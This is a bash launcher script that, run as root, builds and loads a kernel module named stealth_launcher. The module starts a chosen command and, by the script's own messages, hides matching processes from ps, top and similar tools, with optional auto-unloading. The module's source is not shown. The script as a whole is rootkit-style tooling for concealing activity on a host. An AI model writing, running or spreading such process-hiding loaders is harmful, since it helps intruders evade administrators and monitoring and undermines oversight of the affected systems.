#!/bin/bash
# run_stealth.sh - Helper script to run commands with process hiding
# Usage: ./run_stealth.sh -c "sleep 120" -p "sleep"
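# Default values
STEALTH_CMD=""
HIDE_PATTERN=""
AUTO_CLEANUP=1

#######################################
# Parse the command line into the three settings declared above.
# Globals:   STEALTH_CMD, HIDE_PATTERN, AUTO_CLEANUP (written)
# Arguments: -c|--command CMD, -p|--pattern PATTERN,
#            -a|--auto-cleanup VALUE, or a bare CMD (legacy form; only the
#            first bare word is kept, and only if no command is set yet)
# Outputs:   an error line on stderr when an option has no value
# Returns:   exits 1 when an option is given without its value
#######################################
parse_args() {
  while [[ $# -gt 0 ]]; do
    case "$1" in
      -c|--command|-p|--pattern|-a|--auto-cleanup)
        # `shift 2` shifts nothing when only the flag itself is left, so
        # without this guard a trailing option would loop forever.
        if [[ $# -lt 2 ]]; then
          printf '%s: option %s requires a value\n' "$0" "$1" >&2
          exit 1
        fi
        case "$1" in
          -c|--command) STEALTH_CMD="$2" ;;
          -p|--pattern) HIDE_PATTERN="$2" ;;
          -a|--auto-cleanup) AUTO_CLEANUP="$2" ;;
        esac
        shift 2
        ;;
      *)
        # For backward compatibility
        if [[ -z "$STEALTH_CMD" ]]; then
          STEALTH_CMD="$1"
        fi
        shift
        ;;
    esac
  done
}

# Parse command line arguments
parse_args "$@"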
# A command is mandatory: print the usage summary and stop when none was parsed.
if [[ -z "$STEALTH_CMD" ]]; then
  printf '%s\n' \
    "Usage: $0 -c \"command to run in stealth mode\" [-p \"pattern to hide\"] [-a 0|1]" \
    "Example: $0 -c \"sleep 120\" -p \"sleep\"" \
    " -a 1 Enable auto-cleanup (default)" \
    " -a 0 Disable auto-cleanup" \
    " or: $0 \"command to run in stealth mode\" (backward compatibility)"
  exit 1
fi

# The later steps load and unload a kernel module, so refuse to run for any
# effective UID other than 0.
if (( EUID != 0 )); then
  printf '%s\n' "This script must be run as root"
  exit 1
fi
# Build the module on demand from the current directory. make's output is
# discarded, so a failed build surfaces only as the generic message below.
if [[ ! -f stealth_launcher.ko ]]; then
  echo "Building kernel module..."
  if ! make stealth_launcher.ko >/dev/null 2>&1; then
    echo "Failed to build the kernel module"
    exit 1
  fi
fi

# Unload a copy that is already listed by lsmod. rmmod's output is silenced
# and its exit status is not checked, so a failed unload goes unreported here.
lsmod | grep -q "stealth_launcher" && {
  echo "Removing existing stealth_launcher module..."
  rmmod stealth_launcher >/dev/null 2>&1
}
# Assemble the module parameters as one space-separated string.
# The sed expression puts a backslash in front of every double quote in the
# value; no other character is altered.
ESCAPED_CMD=$(echo "$STEALTH_CMD" | sed 's/"/\\"/g')
printf -v MODULE_PARAMS 'target_cmd="%s"' "$ESCAPED_CMD"

# hide_pattern is appended only when a pattern was supplied.
if [[ -n "$HIDE_PATTERN" ]]; then
  ESCAPED_PATTERN=$(echo "$HIDE_PATTERN" | sed 's/"/\\"/g')
  MODULE_PARAMS+=" hide_pattern=\"${ESCAPED_PATTERN}\""
fi

# auto_cleanup is always passed, with whatever value the command line gave.
MODULE_PARAMS+=" auto_cleanup=${AUTO_CLEANUP}"
# This statement only writes to /dev/null and hides nothing; the message can
# appear only if that write itself fails.
echo 1 > /dev/null || echo "Hiding module loader processes disabled"

# Announce the parameters, then load the module.
# The parameter string is printed here and passed on insmod's command line,
# so terminal capture and process-exec logging on the host both record the
# launched command and the requested name pattern in clear text.
echo "Loading stealth_launcher with parameters: $MODULE_PARAMS"
echo "Auto-cleanup mode: $(if [ "$AUTO_CLEANUP" -eq 1 ]; then echo "enabled"; else echo "disabled"; fi)"
# Left unquoted as in the original: the string is word-split into separate
# insmod arguments. insmod's own output is discarded.
insmod stealth_launcher.ko $MODULE_PARAMS >/dev/null 2>&1
RESULT=$?

# Load failed: point the operator at the kernel log and stop.
if [ "$RESULT" -ne 0 ]; then
  echo "Failed to load module. Check kernel log for details."
  echo "Try dmesg | tail"
  exit 1
fi

echo "Command launched in stealth mode"
echo "Process will be hidden from ps, top, and other tools"
if [ "$AUTO_CLEANUP" -eq 1 ]; then
  echo "Module will automatically unload when process completes"
else
  echo "To unhide processes, run: rmmod stealth_launcher"
fi

# With auto-cleanup off the script silences its own output and then blocks
# on tail indefinitely, which leaves a long-lived `tail -f /dev/null` child
# of a root shell in the process table until it is killed.
if [ "$AUTO_CLEANUP" -eq 0 ]; then
  sleep 1
  exec > /dev/null 2>&1
  tail -f /dev/null
fi

exit 0